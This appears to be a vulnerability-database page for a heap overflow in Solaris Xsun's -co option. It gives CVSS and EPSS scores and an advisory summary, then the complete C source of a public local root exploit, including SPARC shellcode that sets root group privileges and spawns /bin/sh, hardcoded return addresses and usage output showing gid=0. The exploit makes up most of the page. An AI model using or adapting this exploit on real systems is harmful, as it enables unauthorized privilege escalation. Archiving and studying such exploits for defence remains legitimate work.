CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Buffer overflow in Xsun on Solaris 2.6 through 8 allows local users to gain root privileges via a long -co (color database) command line argument.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.2
AV:L/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
1.92%
–
–
2022-02-13
–
–
1.92%
–
–
2022-04-03
–
–
1.92%
–
–
2022-06-26
–
–
1.92%
–
–
2022-11-13
–
–
1.92%
–
–
2022-11-20
–
–
1.92%
–
–
2022-12-11
–
–
1.92%
–
–
2022-12-18
–
–
1.92%
–
–
2022-12-25
–
–
1.92%
–
–
2023-01-01
–
–
1.92%
–
–
2023-02-12
–
–
1.92%
–
–
2023-03-12
–
–
–
0.04%
–
2024-06-02
–
–
–
0.04%
–
2025-01-19
–
–
–
0.04%
–
2025-03-18
–
–
–
–
0.18%
2025-03-30
–
–
–
–
0.18%
2025-04-15
–
–
–
–
0.18%
2025-04-15
–
–
–
–
0.18,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
// source: https://www.securityfocus.com/bid/4408/info
Solaris is the freely available Unix operating system distributed by Sun Microsystems.
It may be possible for a local user to gain elevated privileges. When Xsun is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges.
/* Xsun(sparc) local exploit
by gloomy (gloomy@root66.org) & eSDee (esdee@netric.org)
------------------------------------------------------------------
Xsun is a Solaris server for X version 11. This program contains
an option that is not really secure nowadays :).
The option is used to determine the color database file. And yeah,
indeed, you guessed it already, it contains a heap overflow.
When we were busy writing this exploit within a multi display
screen, we discovered some weird "unable-to-write-over-stackframe"
problems. We tried everything to just write a few bytes over a
saved program counter, but unfortunatly it was not possible on the
current machine we were using. Then eSDee came up with something
news. In the middle of the night a loud "yippeaaaaaa!" came out
the bedroom of mister Es. He discovered a little section just
below the GOT. It didn't contain \0 bytes and it was writeable.
It's called the ti_jmp_table. I'm sure eSDee will write some
papers about it soon.
Gloomy was busy writing a shellcode that re-opens the STDIN. He
found out that he just could open /dev/tty and then duplicate the
STDERR filedescriptor, so the important descriptors were back
again.
USAGE:
./Xsun-expl [retloc] [ret]
Example:
bash$ gcc -o Xsun-expl Xsun-expl.c -Wall -Werror
bash$ ./Xsun-expl
Couldn't open RGB_DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....
...
bash$ id
uid=500(user) gid=0(root)
Greets and kisses:
#netric - www.netric.org
#root66 - www.root66.org
mostlyharmless - www.mostly-harmless.nl [soon]
dB_____ - fijne broer van gloom-ei! :)
squezel - lekker ventje ben jij.
More information available at: http://online.securityfocus.com/advisories/40
09
[ps. wat een lompe text]
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PATH "/usr/openwin/bin/Xsun"
#define DISPLAY ":1"
#define SIZE 5128
#define RET 0xffbef7bc
#define RETLOC 0xfecbea30 /* <ti_jmp_table+4> (a pointer to _retu
rn_zero) */
#define DUMMY 0xac1db0ef
struct WORD {
long element;
long dummy;
};
struct TREE {
struct WORD t_s; /* size of this element */
struct WORD t_p; /* parent node */
struct WORD t_l; /* left child */
struct WORD t_r; /* right child */
struct WORD t_n; /* next in link list */
struct WORD t_d; /* dummy to reserve space for self-pointer */
};
char
shellcode[]=
/*
setregid(0,0); setting root permission
s
open("/dev/tty", RD_ONLY); re-open STDIN
dup(2); duplicate STDOUT to STD
ERR
execve("/bin//sh", &argv[0], NULL); start the shell
exit(); exit
*/
"\x90\x1d\x80\x16" // xor %l6, %l6, %o0
"\x92\x1d\x80\x16" // xor %l6, %l6, %o1
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\xcb" // mov 0x2e, %g1
"\x91\xd0\x20\x08" // ta 8 [setreg
id(0,0)]
"\x21\x0b\xd9\x19" // sethi %hi(0x2f646400), %l0
"\xa0\x14\x21\x76" // or %l0, 0x176, %l0
"\x23\x0b\xdd\x1d" // sethi %hi(0x2f747400), %l1
"\xa2\x14\x60\x79" // or %l1, 0x79, %l1
"\xe0\x3b\xbf\xf8" // std %l0, [ %sp - 0x8 ]
"\x90\x23\xa0\x08" // sub %sp, 8, %o0
"\x92\x1b\x80\x0e" // xor %sp, %sp, %o1
"\x82\x10\x20\x05" // mov 0x05, %g1
"\x91\xd0\x20\x08" // ta 8 [open("
/dev/tty",RD_ONLY)]
"\x90\x10\x20\x02" // mov 0x02, %o0
"\x82\x10\x20\x29" // mov 0x29, %g1
"\x91\xd0\x20\x08" // ta 8 [dup(2)
]
"\x21\x0b\xd8\x9a" // sethi %hi(0x2f626800), %l0
"\xa0\x14\x21\x6e" // or %l0, 0x16e, %l0
"\x23\x0b\xcb\xdc" // sethi %hi(0x2f2f7000), %l1
"\xa2\x14\x63\x68" // or %l1, 0x368, %l1
"\xe0\x3b\xbf\xf0" // std %l0, [ %sp - 0x10 ]
"\xc0\x23\xbf\xf8" // clr [ %sp - 0x8 ]
"\x90\x23\xa0\x10" // sub %sp, 0x10, %o0
"\xc0\x23\xbf\xec" // clr [ %sp - 0x14 ]
"\xd0\x23\xbf\xe8" // st %o0, [ %sp - 0x18 ]
"\x92\x23\xa0\x18" // sub %sp, 0x18, %o1
"\x94\x22\x80\x0a" // sub %o2, %o2, %o2
"\x82\x18\x40\x01" // xor %g1, %g1, %g1
"\x82\x10\x20\x3b" // mov 0x3b, %g1
"\x91\xd0\x20\x08" // ta 8 [execve
("/bin/sh","/bin/sh",NULL)]
"\x82\x10\x20\x01" // mov 0x01, %g1
"\x91\xd0\x20\x08" // ta 8 [exit(?
)]
"\x10\xbf\xff\xdf" // b shellcode
"\x90\x1d\x80\x16"; // or %o1, %o1, %o1
int
main(int argc, char *argv[])
{
struct TREE faketree; // our friendly little
tree
char buffer[SIZE+sizeof(faketree)+1];
unsigned int ret = RET;
unsigned int retloc = RETLOC;
unsigned int dummy = DUMMY;
if (argc > 1) retloc = strtoul(argv[1], &argv[1], 16);
if (argc > 2) ret = strtoul(argv[2], &argv[2], 16);
faketree.t_s.element = 0xfffffff0;
faketree.t_s.dummy = dummy;
faketree.t_n.element = retloc - 8;
faketree.t_n.dummy = dummy;
faketree.t_l.element = 0xffffffff;
faketree.t_l.dummy = dummy;
faketree.t_r.element = dummy;
faketree.t_r.dummy = dummy;
faketree.t_p.element = ret;
faketree.t_p.dummy = dummy;
faketree.t_d.element = dummy;
faketree.t_d.dummy = dummy;
memset(buffer, 0x41, sizeof(buffer));
memcpy(buffer + 3999 - (strlen(shellcode) - 8), shellcode, strlen(shell
code));
memcpy(buffer + SIZE, &faketree, sizeof(faketree));
buffer[SIZE + sizeof(faketree)] = 0x0;
fprintf(stdout, "Retloc = 0x%08x\n"
"Ret = 0x%08x\n",
retloc, ret);
execl(PATH, "Xsun", "-co", buffer, DISPLAY, NULL);
return 0;
}
/* [eof] */